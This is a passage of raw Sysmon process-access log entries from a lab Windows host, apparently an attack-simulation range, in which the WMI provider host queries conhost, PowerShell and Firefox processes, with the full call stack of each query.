ll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150550Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6801-00000000D101}1724C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150549Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6701-00000000D101}1880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150548Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6701-00000000D101}1880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150547Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5801-00000000D101}1968C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150546Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5801-00000000D101}1968C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150545Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5701-00000000D101}416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150544Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5701-00000000D101}416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150543Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-144D-60CA-3801-00000000D101}2868C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150542Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-144D-60CA-3801-00000000D101}2868C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150541Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3601-00000000D101}4536C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150540Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3601-00000000D101}4536C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150539Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3501-00000000D101}4808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150538Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3501-00000000D101}4808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150537Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1321-60CA-1001-00000000D101}2680C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150536Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1321-60CA-1001-00000000D101}2680C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150535Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0F01-00000000D101}1408C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dl